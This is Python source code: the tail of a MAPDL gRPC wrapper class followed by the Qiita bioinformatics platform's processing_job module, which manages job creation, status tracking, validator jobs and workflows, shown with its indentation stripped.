super().sectinqr(nsect, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.mpinqr)
def mpinqr(self, mat, iprop, key, **kwargs):
"""Wrap the ``mpinqr`` method to take advantage of the gRPC methods."""
super().mpinqr(mat, iprop, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.dget)
def dget(self, node, idf, kcmplx, **kwargs):
"""Wrap the ``dget`` method to take advantage of the gRPC methods."""
super().dget(node, idf, kcmplx, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.fget)
def fget(self, node, idf, kcmplx, **kwargs):
"""Wrap the ``fget`` method to take advantage of the gRPC methods."""
super().fget(node, idf, kcmplx, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.erinqr)
def erinqr(self, key, **kwargs):
"""Wrap the ``erinqr`` method to take advantage of the gRPC methods."""
super().erinqr(key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.wrinqr)
def wrinqr(self, key, **kwargs):
"""Wrap the ``wrinqr`` method to take advantage of the gRPC methods."""
super().wrinqr(key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
|
processing_job.py
|
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from uuid import UUID
from datetime import datetime
from subprocess import Popen, PIPE
from multiprocessing import Process
from os.path import join
from itertools import chain
from collections import defaultdict, Iterable
from json import dumps, loads
from time import sleep
from future.utils import viewitems, viewvalues
import networkx as nx
from qiita_core.qiita_settings import qiita_config
import qiita_db as qdb
def _system_call(cmd):
"""Execute the command `cmd`
Parameters
----------
cmd : str
The string containing the command to be run.
Returns
-------
tuple of (str, str, int)
        The standard output, standard error and exit status of the
executed command
Notes
-----
This function is ported from QIIME (http://www.qiime.org), previously named
qiime_system_call. QIIME is a GPL project, but we obtained permission from
the authors of this function to port it to Qiita and keep it under BSD
license.
"""
proc = Popen(cmd, universal_newlines=True, shell=True, stdout=PIPE,
stderr=PIPE)
# Communicate pulls all stdout/stderr from the PIPEs
# This call blocks until the command is done
stdout, stderr = proc.communicate()
return_value = proc.returncode
return stdout, stderr, return_value
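# A minimal usage sketch (illustrative only; assumes a POSIX-like shell):
#
#   stdout, stderr, status = _system_call("echo hello")
#   # status == 0, stdout == "hello\n", stderr == ""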
def _job_submitter(job_id, cmd):
"""Executes the commands `cmd` and updates the job in case of failure
Parameters
----------
job_id : str
The job id that is executed by cmd
cmd : str
The command to execute the job
"""
std_out, std_err, return_value = _system_call(cmd)
if return_value != 0:
error = ("Error submitting job:\nStd output:%s\nStd error:%s"
% (std_out, std_err))
# Forcing the creation of a new connection
qdb.sql_connection.create_new_transaction()
ProcessingJob(job_id).complete(False, error=error)
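# Illustrative only: ``_job_submitter`` is meant to run in a separate process
# so a failed submission cannot block the caller; ``ProcessingJob.submit``
# below does essentially:
#
#   Process(target=_job_submitter, args=(job_id, cmd)).start()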
class ProcessingJob(qdb.base.QiitaObject):
r"""Models a job that executes a command in a set of artifacts
Attributes
----------
user
command
parameters
status
log
heartbeat
step
Methods
-------
exists
create
"""
_table = 'processing_job'
@classmethod
def exists(cls, job_id):
"""Check if the job `job_id` exists
Parameters
----------
job_id : str
The job id
Returns
-------
bool
True if the job `job_id` exists. False otherwise.
"""
try:
UUID(job_id)
except ValueError:
return False
with qdb.sql_connection.TRN:
sql = """SELECT EXISTS(SELECT *
FROM qiita.processing_job
WHERE processing_job_id = %s)"""
qdb.sql_connection.TRN.add(sql, [job_id])
return qdb.sql_connection.TRN.execute_fetchlast()
@classmethod
def create(cls, user, parameters, force=False):
"""Creates a new job in the system
Parameters
----------
user : qiita_db.user.User
The user executing the job
parameters : qiita_db.software.Parameters
The parameters of the job being executed
force : bool
Force creation on duplicated parameters
Returns
-------
qiita_db.processing_job.ProcessingJob
The newly created job
Notes
-----
        If `force` is True, the job will be created even if another job
        with the same parameters already exists
"""
TTRN = qdb.sql_connection.TRN
with TTRN:
command = parameters.command
# check if a job with the same parameters already exists
sql = """SELECT processing_job_id, email, processing_job_status,
COUNT(aopj.artifact_id)
FROM qiita.processing_job
LEFT JOIN qiita.processing_job_status
USING (processing_job_status_id)
LEFT JOIN qiita.artifact_output_processing_job aopj
USING (processing_job_id)
WHERE command_id = %s AND processing_job_status IN (
'success', 'waiting', 'running', 'in_construction') {0}
GROUP BY processing_job_id, email,
processing_job_status"""
            # we need to use ILIKE for the comparison because boolean values
            # may be stored as either 'false' or 'False'
params = []
for k, v in viewitems(parameters.values):
# this is necessary in case we have an Iterable as a value
# but that is not unicode or string
if isinstance(v, Iterable) and not isinstance(v, (str,
unicode)):
for vv in v:
params.extend([k, str(vv)])
else:
params.extend([k, str(v)])
if params:
# divided by 2 as we have key-value pairs
                len_params = len(params) // 2
sql = sql.format(' AND ' + ' AND '.join(
["command_parameters->>%s ILIKE %s"] * len_params))
params = [command.id] + params
TTRN.add(sql, params)
else:
# the sql variable expects the list of parameters but if there
# is no param we need to replace the {0} with an empty string
TTRN.add(sql.format(""), [command.id])
# checking that if the job status is success, it has children
# [2] status, [3] children count
existing_jobs = [r for r in TTRN.execute_fetchindex()
if r[2] != 'success' or r[3] > 0]
if existing_jobs and not force:
raise ValueError(
'Cannot create job because the parameters are the same as '
'jobs that are queued, running or already have '
'succeeded:\n%s' % '\n'.join(
["%s: %s" % (jid, status)
for jid, _, status, _ in existing_jobs]))
sql = """INSERT INTO qiita.processing_job
(email, command_id, command_parameters,
processing_job_status_id)
VALUES (%s, %s, %s, %s)
RETURNING processing_job_id"""
status = qdb.util.convert_to_id(
"in_construction", "processing_job_status")
sql_args = [user.id, command.id,
parameters.dump(), status]
TTRN.add(sql, sql_args)
job_id = TTRN.execute_fetchlast()
# Link the job with the input artifacts
sql = """INSERT INTO qiita.artifact_processing_job
(artifact_id, processing_job_id)
VALUES (%s, %s)"""
pending = defaultdict(dict)
for pname, vals in command.parameters.items():
if vals[0] == 'artifact':
artifact_info = parameters.values[pname]
# If the artifact_info is a list, then the artifact
                    # still doesn't exist because the current job is part
# of a workflow, so we can't link
if not isinstance(artifact_info, list):
TTRN.add(sql, [artifact_info, job_id])
else:
pending[artifact_info[0]][pname] = artifact_info[1]
if pending:
sql = """UPDATE qiita.processing_job
SET pending = %s
WHERE processing_job_id = %s"""
TTRN.add(sql, [dumps(pending), job_id])
TTRN.execute()
return cls(job_id)
@property
def user(self):
"""The user that launched the job
Returns
-------
qiita_db.user.User
The user that launched the job
"""
with qdb.sql_connection.TRN:
sql = """SELECT email
FROM qiita.processing_job
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
email = qdb.sql_connection.TRN.execute_fetchlast()
return qdb.user.User(email)
@property
def command(self):
"""The command that the job executes
Returns
-------
qiita_db.software.Command
The command that the job executes
"""
with qdb.sql_connection.TRN:
sql = """SELECT command_id
FROM qiita.processing_job
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
cmd_id = qdb.sql_connection.TRN.execute_fetchlast()
return qdb.software.Command(cmd_id)
@property
def parameters(self):
"""The parameters used in the job's command
Returns
-------
qiita_db.software.Parameters
The parameters used in the job's command
"""
with qdb.sql_connection.TRN:
sql = """SELECT command_id, command_parameters
FROM qiita.processing_job
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
res = qdb.sql_connection.TRN.execute_fetchindex()[0]
return qdb.software.Parameters.load(
qdb.software.Command(res[0]), values_dict=res[1])
@property
def input_artifacts(self):
"""The artifacts used as input in the job
Returns
-------
list of qiita_db.artifact.Artifact
            The artifacts used as input in the job
"""
with qdb.sql_connection.TRN:
sql = """SELECT artifact_id
FROM qiita.artifact_processing_job
WHERE processing_job_id = %s
ORDER BY artifact_id"""
qdb.sql_connection.TRN.add(sql, [self.id])
return [qdb.artifact.Artifact(aid)
for aid in qdb.sql_connection.TRN.execute_fetchflatten()]
@property
def status(self):
"""The status of the job
Returns
-------
str
The current status of the job, one of {'queued', 'running',
'success', 'error', 'in_construction', 'waiting'}
"""
with qdb.sql_connection.TRN:
sql = """SELECT processing_job_status
FROM qiita.processing_job_status
JOIN qiita.processing_job
USING (processing_job_status_id)
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
return qdb.sql_connection.TRN.execute_fetchlast()
def _set_status(self, value):
"""Sets the status of the job
Parameters
----------
value : str, {'queued', 'running', 'success', 'error',
'in_construction', 'waiting'}
The new status of the job
Raises
------
qiita_db.exceptions.QiitaDBStatusError
- If the current status of the job is 'success'
- If the current status of the job is 'running' and `value` is
'queued'
"""
with qdb.sql_connection.TRN:
current_status = self.status
if current_status == 'success':
raise qdb.exceptions.QiitaDBStatusError(
"Cannot change the status of a 'success' job")
elif current_status == 'running' and value == 'queued':
raise qdb.exceptions.QiitaDBStatusError(
"Cannot revert the status of a 'running' job to 'queued'")
new_status = qdb.util.convert_to_id(
value, "processing_job_status")
sql = """UPDATE qiita.processing_job
SET processing_job_status_id = %s
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [new_status, self.id])
qdb.sql_connection.TRN.execute()
def _generate_cmd(self):
"""Generates the command to submit the job
Returns
-------
str
The command to use to submit the job
"""
job_dir = join(qdb.util.get_work_base_dir(), self.id)
software = self.command.software
plugin_start_script = software.start_script
plugin_env_script = software.environment_script
# Appending the portal URL so the job requests the information from the
# portal server that submitted the job
url = "%s%s" % (qiita_config.base_url, qiita_config.portal_dir)
cmd = '%s "%s" "%s" "%s" "%s" "%s"' % (
qiita_config.plugin_launcher, plugin_env_script,
plugin_start_script, url, self.id, job_dir)
return cmd
def submit(self):
"""Submits the job to execution
Raises
------
QiitaDBOperationNotPermittedError
If the job is not in 'waiting' or 'in_construction' status
"""
with qdb.sql_connection.TRN:
status = self.status
if status not in {'in_construction', 'waiting'}:
raise qdb.exceptions.QiitaDBOperationNotPermittedError(
"Can't submit job, not in 'in_construction' or "
"'waiting' status. Current status: %s" % status)
self._set_status('queued')
# At this point we are going to involve other processes. We need
# to commit the changes to the DB or the other processes will not
# see these changes
qdb.sql_connection.TRN.commit()
cmd = self._generate_cmd()
p = Process(target=_job_submitter, args=(self.id, cmd))
p.start()
def release(self):
"""Releases the job from the waiting status and creates the artifact
Returns
-------
dict of {int: int}
The mapping between the job output and the artifact
"""
with qdb.sql_connection.TRN:
if self.command.software.type != 'artifact definition':
raise qdb.exceptions.QiitaDBOperationNotPermittedError(
"Only artifact definition jobs can be released")
# Retrieve the artifact information from the DB
sql = """SELECT artifact_info
FROM qiita.processing_job_validator
WHERE validator_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
a_info = qdb.sql_connection.TRN.execute_fetchlast()
provenance = loads(self.parameters.values['provenance'])
job = ProcessingJob(provenance['job'])
if 'data_type' in a_info:
# This job is resulting from a private job
parents = None
params = None
cmd_out_id = None
name = None
data_type = a_info['data_type']
analysis = qdb.analysis.Analysis(
job.parameters.values['analysis'])
a_info = a_info['artifact_data']
else:
# This job is resulting from a plugin job
parents = job.input_artifacts
params = job.parameters
cmd_out_id = provenance['cmd_out_id']
name = provenance['name']
analysis = None
data_type = None
# Create the artifact
atype = a_info['artifact_type']
filepaths = a_info['filepaths']
a = qdb.artifact.Artifact.create(
filepaths, atype, parents=parents,
processing_parameters=params,
analysis=analysis, data_type=data_type, name=name)
self._set_status('success')
mapping = {}
if cmd_out_id is not None:
mapping = {cmd_out_id: a.id}
return mapping
def release_validators(self):
"""Allows all the validator job spawned by this job to complete"""
with qdb.sql_connection.TRN:
if self.command.software.type not in ('artifact transformation',
'private'):
raise qdb.exceptions.QiitaDBOperationNotPermittedError(
"Only artifact transformation and private jobs can "
"release validators")
# Check if all the validators are completed. Validator jobs can be
# in two states when completed: 'waiting' in case of success
# or 'error' otherwise
sql = """SELECT pjv.validator_id
FROM qiita.processing_job_validator pjv
JOIN qiita.processing_job pj ON
pjv.validator_id = pj.processing_job_id
JOIN qiita.processing_job_status USING
(processing_job_status_id)
WHERE pjv.processing_job_id = %s
AND processing_job_status NOT IN %s"""
sql_args = [self.id, ('waiting', 'error')]
qdb.sql_connection.TRN.add(sql, sql_args)
validator_ids = qdb.sql_connection.TRN.execute_fetchindex()
# Active polling - wait until all validator jobs are completed
while validator_ids:
jids = ', '.join([j[0] for j in validator_ids])
self.step = ("Validating outputs (%d remaining) via "
"job(s) %s" % (len(validator_ids), jids))
sleep(10)
qdb.sql_connection.TRN.add(sql, sql_args)
validator_ids = qdb.sql_connection.TRN.execute_fetchindex()
# Check if any of the validators errored
sql = """SELECT validator_id
FROM qiita.processing_job_validator pjv
JOIN qiita.processing_job pj
ON pjv.validator_id = pj.processing_job_id
JOIN qiita.processing_job_status USING
(processing_job_status_id)
WHERE pjv.processing_job_id = %s AND
processing_job_status = %s"""
qdb.sql_connection.TRN.add(sql, [self.id, 'error'])
errored = qdb.sql_connection.TRN.execute_fetchflatten()
if errored:
# At least one of the validators failed. Set the rest of the
# validators and the current job as failed
qdb.sql_connection.TRN.add(sql, [self.id, 'waiting'])
waiting = qdb.sql_connection.TRN.execute_fetchflatten()
common_error = "\n".join(
["Validator %s error message: %s"
% (j, ProcessingJob(j).log.msg) for j in errored])
val_error = "%d sister validator jobs failed: %s" % (
len(errored), common_error)
for j in waiting:
ProcessingJob(j)._set_error(val_error)
self._set_error('%d validator jobs failed: %s'
% (len(errored), common_error))
else:
# All validators have successfully completed
sql = """SELECT validator_id
FROM qiita.processing_job_validator
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
mapping = {}
# Loop through all validator jobs and release them, allowing
# to create the artifacts. Note that if any artifact creation
# fails, the rollback operation will make sure that the
# previously created artifacts are not in there
for jid in qdb.sql_connection.TRN.execute_fetchflatten():
vjob = ProcessingJob(jid)
mapping.update(vjob.release())
if mapping:
sql = """INSERT INTO
qiita.artifact_output_processing_job
(artifact_id, processing_job_id,
command_output_id)
VALUES (%s, %s, %s)"""
sql_args = [[aid, self.id, outid]
for outid, aid in viewitems(mapping)]
qdb.sql_connection.TRN.add(sql, sql_args, many=True)
self._update_and_launch_children(mapping)
self._set_status('success')
def _complete_artifact_definition(self, artifact_data):
""""Performs the needed steps to complete an artifact definition job
In order to complete an artifact definition job we need to create
the artifact, and then start all the jobs that were waiting for this
artifact to be created. Note that each artifact definition job creates
one and only one artifact.
Parameters
----------
artifact_data : {'filepaths': list of (str, str), 'artifact_type': str}
Dict with the artifact information. `filepaths` contains the list
of filepaths and filepath types for the artifact and
`artifact_type` the type of the artifact
"""
with qdb.sql_connection.TRN:
atype = artifact_data['artifact_type']
filepaths = artifact_data['filepaths']
# We need to determine whether this artifact is the
# result of a previous job or of an upload
job_params = self.parameters.values
if job_params['provenance'] is not None:
# The artifact is a result from a previous job
provenance = loads(job_params['provenance'])
if provenance.get('data_type') is not None:
artifact_data = {'data_type': provenance['data_type'],
'artifact_data': artifact_data}
sql = """UPDATE qiita.processing_job_validator
SET artifact_info = %s
WHERE validator_id = %s"""
qdb.sql_connection.TRN.add(
sql, [dumps(artifact_data), self.id])
qdb.sql_connection.TRN.execute()
# Can't create the artifact until all validators are completed
self._set_status('waiting')
else:
# The artifact is uploaded by the user or is the initial
# artifact of an analysis
if ('analysis' in job_params and
job_params['analysis'] is not None):
pt = None
an = qdb.analysis.Analysis(job_params['analysis'])
sql = """SELECT data_type
FROM qiita.analysis_processing_job
WHERE analysis_id = %s
AND processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [an.id, self.id])
data_type = qdb.sql_connection.TRN.execute_fetchlast()
else:
pt = qdb.metadata_template.prep_template.PrepTemplate(
job_params['template'])
an = None
data_type = None
qdb.artifact.Artifact.create(
filepaths, atype, prep_template=pt, analysis=an,
data_type=data_type, name=job_params['name'])
self._set_status('success')
def _complete_artifact_transformation(self, artifacts_data):
"""Performs the needed steps to complete an artifact transformation job
In order to complete an artifact transformation job, we need to create
a validate job for each artifact output and submit it.
Parameters
----------
artifacts_data : dict of dicts
The generated artifact information keyed by output name.
The format of each of the internal dictionaries must be
{'filepaths': list of (str, str), 'artifact_type': str}
where `filepaths` contains the list of filepaths and filepath types
for the artifact and `artifact_type` the type of the artifact
Raises
------
QiitaDBError
If there is more than one prep information attached to the new
artifact
"""
validator_jobs = []
with qdb.sql_connection.TRN:
cmd_id = self.command.id
for out_name, a_data in viewitems(artifacts_data):
# Correct the format of the filepaths parameter so we can
# create a validate job
filepaths = defaultdict(list)
for fp, fptype in a_data['filepaths']:
filepaths[fptype].append(fp)
atype = a_data['artifact_type']
# The validate job needs a prep information file. In theory,
# a job can be generated from more than one prep information
# file, so we check here if we have one or more templates. At
# this moment, if we allow more than one template, there is a
# fair amount of changes that need to be done on the plugins,
# so we are going to restrict the number of templates to one.
# Note that at this moment there is no way of generating an
# artifact from 2 or more artifacts, so we can impose this
# limitation now and relax it later.
templates = set()
for artifact in self.input_artifacts:
templates.update(pt.id for pt in artifact.prep_templates)
template = None
analysis = None
if len(templates) > 1:
raise qdb.exceptions.QiitaDBError(
"Currently only single prep template "
"is allowed, found %d" % len(templates))
elif len(templates) == 1:
template = templates.pop()
else:
# In this case we have 0 templates. What this means is that
# this artifact is being generated in the analysis pipeline
# All the artifacts included in the analysis pipeline
# belong to the same analysis, so we can just ask the
# first artifact for the analysis that it belongs to
analysis = self.input_artifacts[0].analysis.id
# Once the validate job completes, it needs to know if it has
# been generated from a command (and how) or if it has been
# uploaded. In order to differentiate these cases, we populate
# the provenance parameter with some information about the
# current job and how this artifact has been generated. This
# does not affect the plugins since they can ignore this
# parameter
sql = """SELECT command_output_id
FROM qiita.command_output
WHERE name = %s AND command_id = %s"""
qdb.sql_connection.TRN.add(sql, [out_name, cmd_id])
cmd_out_id = qdb.sql_connection.TRN.execute_fetchlast()
naming_params = self.command.naming_order
if naming_params:
params = self.parameters.values
art_name = "%s %s" % (
out_name, ' '.join([str(params[p])
for p in naming_params]))
else:
art_name = out_name
provenance = {'job': self.id,
'cmd_out_id': cmd_out_id,
'name': art_name}
# Get the validator command for the current artifact type and
# create a new job
cmd = qdb.software.Command.get_validator(atype)
values_dict = {
'files': dumps(filepaths), 'artifact_type': atype,
'template': template, 'provenance': dumps(provenance),
'analysis': None}
if analysis is not None:
values_dict['analysis'] = analysis
validate_params = qdb.software.Parameters.load(
cmd, values_dict=values_dict)
validator_jobs.append(
ProcessingJob.create(self.user, validate_params, True))
# Change the current step of the job
self.step = "Validating outputs (%d remaining) via job(s) %s" % (
len(validator_jobs), ', '.join([j.id for j in validator_jobs]))
# Link all the validator jobs with the current job
self._set_validator_jobs(validator_jobs)
# Submit all the validator jobs
for j in validator_jobs:
j.submit()
# Submit the job that will release all the validators
plugin = qdb.software.Software.from_name_and_version(
'Qiita', 'alpha')
cmd = plugin.get_command('release_validators')
params = qdb.software.Parameters.load(
cmd, values_dict={'job': self.id})
job = ProcessingJob.create(self.user, params)
# Doing the submission outside of the transaction
job.submit()
def _set_validator_jobs(self, validator_jobs):
"""Sets the validator jobs for the current job
Parameters
----------
validator_jobs : list of ProcessingJob
The validator_jobs for the current job
"""
with qdb.sql_connection.TRN:
sql = """INSERT INTO qiita.processing_job_validator
(processing_job_id, validator_id)
VALUES (%s, %s)"""
sql_args = [[self.id, j.id] for j in validator_jobs]
qdb.sql_connection.TRN.add(sql, sql_args, many=True)
qdb.sql_connection.TRN.execute()
def complete(self, success, artifacts_data=None, error=None):
"""Completes the job, either with a success or error status
Parameters
----------
success : bool
Whether the job has completed successfully or not
artifacts_data : dict of dicts, optional
The generated artifact information keyed by output name.
The format of each of the internal dictionaries must be
{'filepaths': list of (str, str), 'artifact_type': str}
where `filepaths` contains the list of filepaths and filepath types
for the artifact and `artifact_type` the type of the artifact
error : str, optional
If the job was not successful, the error message
Raises
------
qiita_db.exceptions.QiitaDBOperationNotPermittedError
If the job is not in running state
"""
with qdb.sql_connection.TRN:
if success:
if self.status != 'running':
# If the job is not running, we only allow completing it
# if it did not succeed
raise qdb.exceptions.QiitaDBOperationNotPermittedError(
"Can't complete job: not in a running state")
if artifacts_data:
if self.command.software.type == 'artifact definition':
# There is only one artifact created
_, a_data = artifacts_data.popitem()
self._complete_artifact_definition(a_data)
else:
self._complete_artifact_transformation(artifacts_data)
else:
self._set_status('success')
else:
self._set_error(error)
@property
def log(self):
"""The log entry attached to the job if it failed
Returns
-------
qiita_db.logger.LogEntry or None
If the status of the job is `error`, returns the LogEntry attached
to the job
"""
with qdb.sql_connection.TRN:
res = None
if self.status == 'error':
sql = """SELECT logging_id
FROM qiita.processing_job
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
log_id = qdb.sql_connection.TRN.execute_fetchlast()
res = qdb.logger.LogEntry(log_id)
return res
def _set_error(self, error):
"""Attaches a log entry to the job
Parameters
----------
error : str
The error message
Raises
------
qiita_db.exceptions.QiitaDBOperationNotPermittedError
If the status of the job is 'success'
"""
with qdb.sql_connection.TRN:
if self.status == 'success':
raise qdb.exceptions.QiitaDBOperationNotPermittedError(
"Can only set up the log for jobs whose status is 'error'")
self._set_status('error')
log = qdb.logger.LogEntry.create('Runtime', error)
sql = """UPDATE qiita.processing_job
SET logging_id = %s
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [log.id, self.id])
qdb.sql_connection.TRN.execute()
# All the children should be marked as failure
for c in self.children:
c.complete(False, error="Parent job '%s' failed." % self.id)
@property
def heartbeat(self):
"""The timestamp of the last heartbeat received from the job
Returns
-------
datetime
The last heartbeat timestamp
"""
with qdb.sql_connection.TRN:
sql = """SELECT heartbeat
FROM qiita.processing_job
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
return qdb.sql_connection.TRN.execute_fetchlast()
def update_heartbeat_state(self):
"""Updates the heartbeat of the job
In case that the job is in `queued` status, it changes the status to
`running`.
Raises
------
QiitaDBOperationNotPermittedError
If the job is already completed
"""
with qdb.sql_connection.TRN:
status = self.status
if status == 'queued':
self._set_status('running')
elif status != 'running':
raise qdb.exceptions.QiitaDBOperationNotPermittedError(
"Can't execute heartbeat on job: already completed")
sql = """UPDATE qiita.processing_job
SET heartbeat = %s
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [datetime.now(), self.id])
qdb.sql_connection.TRN.execute()
@property
def step(self):
"""Returns the current step of the job
Returns
-------
str
The current step of the job
"""
with qdb.sql_connection.TRN:
sql = """SELECT step
FROM qiita.processing_job
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
return qdb.sql_connection.TRN.execute_fetchlast()
@step.setter
def step(self, value):
"""Sets the current step of the job
Parameters
----------
value : str
The new current step of the job
Raises
------
qiita_db.exceptions.QiitaDBOperationNotPermittedError
If the status of the job is not 'running'
"""
with qdb.sql_connection.TRN:
if self.status != 'running':
raise qdb.exceptions.QiitaDBOperationNotPermittedError(
"Cannot change the step of a job whose status is not "
"'running'")
sql = """UPDATE qiita.processing_job
SET step = %s
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [value, self.id])
qdb.sql_connection.TRN.execute()
@property
def children(self):
"""The children jobs
Returns
-------
generator of qiita_db.processing_job.ProcessingJob
The children jobs
"""
with qdb.sql_connection.TRN:
sql = """SELECT child_id
FROM qiita.parent_processing_job
WHERE parent_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
for jid in qdb.sql_connection.TRN.execute_fetchflatten():
yield ProcessingJob(jid)
def _update_children(self, mapping):
"""Updates the children of the current job to populate the input params
Parameters
----------
mapping : dict of {int: int}
The mapping between output parameter and artifact
Returns
-------
list of qiita_db.processing_job.ProcessingJob
The list of childrens that are ready to be submitted
"""
ready = []
with qdb.sql_connection.TRN:
sql = """SELECT command_output_id, name
FROM qiita.command_output
WHERE command_output_id IN %s"""
sql_args = [tuple(mapping.keys())]
qdb.sql_connection.TRN.add(sql, sql_args)
res = qdb.sql_connection.TRN.execute_fetchindex()
new_map = {name: mapping[oid] for oid, name in res}
sql = """SELECT command_parameters, pending
FROM qiita.processing_job
WHERE processing_job_id = %s"""
sql_update = """UPDATE qiita.processing_job
SET command_parameters = %s,
pending = %s
WHERE processing_job_id = %s"""
sql_link = """INSERT INTO qiita.artifact_processing_job
(artifact_id, processing_job_id)
VALUES (%s, %s)"""
for c in self.children:
qdb.sql_connection.TRN.add(sql, [c.id])
params, pending = qdb.sql_connection.TRN.execute_fetchflatten()
for pname, out_name in viewitems(pending[self.id]):
a_id = new_map[out_name]
params[pname] = str(a_id)
del pending[self.id]
# Link the input artifact with the child job
qdb.sql_connection.TRN.add(sql_link, [a_id, c.id])
# Force to insert a NULL in the DB if pending is empty
pending = pending if pending else None
qdb.sql_connection.TRN.add(sql_update,
[dumps(params), pending, c.id])
qdb.sql_connection.TRN.execute()
if pending is None:
# The child already has all the parameters
# Add it to the ready list
ready.append(c)
return ready
def _update_and_launch_children(self, mapping):
"""Updates the children of the current job to populate the input params
Parameters
----------
mapping : dict of {int: int}
The mapping between output parameter and artifact
"""
ready = self._update_children(mapping)
# Submit all the children that already have all the input parameters
for c in ready:
c.submit()
@property
def outputs(self):
"""The outputs of the job
Returns
-------
dict of {str: qiita_db.artifact.Artifact}
The outputs of the job keyed by output name
"""
with qdb.sql_connection.TRN:
if self.status != 'success':
raise qdb.exceptions.QiitaDBOperationNotPermittedError(
"Can't return the outputs of a non-success job")
sql = """SELECT artifact_id, name
FROM qiita.artifact_output_processing_job
JOIN qiita.command_output USING (command_output_id)
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
return {
name: qdb.artifact.Artifact(aid)
for aid, name in qdb.sql_connection.TRN.execute_fetchindex()}
@property
def processing_job_workflow(self):
"""The processing job worflow
Returns
-------
ProcessingWorkflow
The processing job workflow the job belongs to
"""
with qdb.sql_connection.TRN:
# Retrieve the workflow root jobs
sql = """SELECT get_processing_workflow_roots
FROM qiita.get_processing_workflow_roots(%s)"""
qdb.sql_connection.TRN.add(sql, [self.id])
res = qdb.sql_connection.TRN.execute_fetchindex()
if res:
sql = """SELECT processing_job_workflow_id
FROM qiita.processing_job_workflow_root
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [res[0][0]])
r = qdb.sql_connection.TRN.execute_fetchindex()
return (qdb.processing_job.ProcessingWorkflow(r[0][0]) if r
else None)
else:
return None
@property
def pending(self):
"""A dictionary with the information about the predecessor jobs
Returns
-------
dict
A dict with {job_id: {parameter_name: output_name}}"""
with qdb.sql_connection.TRN:
sql = """SELECT pending
FROM qiita.processing_job
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
res = qdb.sql_connection.TRN.execute_fetchlast()
return res if res is not None else {}
@property
def hidden(self):
"""Whether the job is hidden or not
Returns
-------
bool
Whether the job is hidden or not
"""
with qdb.sql_connection.TRN:
sql = """SELECT hidden
FROM qiita.processing_job
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
return qdb.sql_connection.TRN.execute_fetchlast()
def hide(self):
"""Hides the job from the user
Raises
------
QiitaDBOperationNotPermittedError
If the job is not in the error status
"""
with qdb.sql_connection.TRN:
status = self.status
if status != 'error':
raise qdb.exceptions.QiitaDBOperationNotPermittedError(
'Only jobs in error status can be hidden. Current status: '
'%s' % status)
sql = """UPDATE qiita.processing_job
SET hidden = %s
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [True, self.id])
qdb.sql_connection.TRN.execute()
class ProcessingWorkflow(qdb.base.QiitaObject):
"""Models a workflow defined by the user
Parameters
----------
user : qiita_db.user.User
The user that modeled the workflow
root : list of qiita_db.processing_job.ProcessingJob
The first job in the workflow
"""
_table = "processing_job_workflow"
@classmethod
def _common_creation_steps(cls, user, root_jobs, name=None):
"""Executes the common creation steps
Parameters
----------
user : qiita_db.user.User
The user creating the workflow
root_jobs : list of qiita_db.processing_job.ProcessingJob
The root jobs of the workflow
name : str, optional
The name of the workflow. Default: generated from user's name
"""
with qdb.sql_connection.TRN:
# Insert the workflow in the processing_job_workflow table
name = name if name else "%s's workflow" % user.info['name']
sql = """INSERT INTO qiita.processing_job_workflow (email, name)
VALUES (%s, %s)
RETURNING processing_job_workflow_id"""
qdb.sql_connection.TRN.add(sql, [user.email, name])
w_id = qdb.sql_connection.TRN.execute_fetchlast()
# Connect the workflow with it's initial set of jobs
sql = """INSERT INTO qiita.processing_job_workflow_root
(processing_job_workflow_id, processing_job_id)
VALUES (%s, %s)"""
sql_args = [[w_id, j.id] for j in root_jobs]
qdb.sql_connection.TRN.add(sql, sql_args, many=True)
qdb.sql_connection.TRN.execute()
return cls(w_id)
@classmethod
def from_default_workflow(cls, user, dflt_wf, req_params, name=None,
force=False):
"""Creates a new processing workflow from a default workflow
Parameters
----------
user : qiita_db.user.User
The user creating the workflow
dflt_wf : qiita_db.software.DefaultWorkflow
The default workflow
req_params : dict of {qdb.software.Command: dict of {str: object}}
The required parameters values for the source commands in the
workflow, keyed by command. The inner dicts are keyed by
parameter name.
name : str, optional
Name of the workflow. Default: generated from user's name
force : bool
Force creation on duplicated parameters
Returns
-------
qiita_db.processing_job.ProcessingWorkflow
The newly created workflow
"""
with qdb.sql_connection.TRN:
dflt_g = dflt_wf.graph
# Find the roots of the workflow. That is, the nodes that do not
# have a parent in the graph (in_degree = 0)
in_degrees = dflt_g.in_degree()
# We can potentially access this information from the nodes
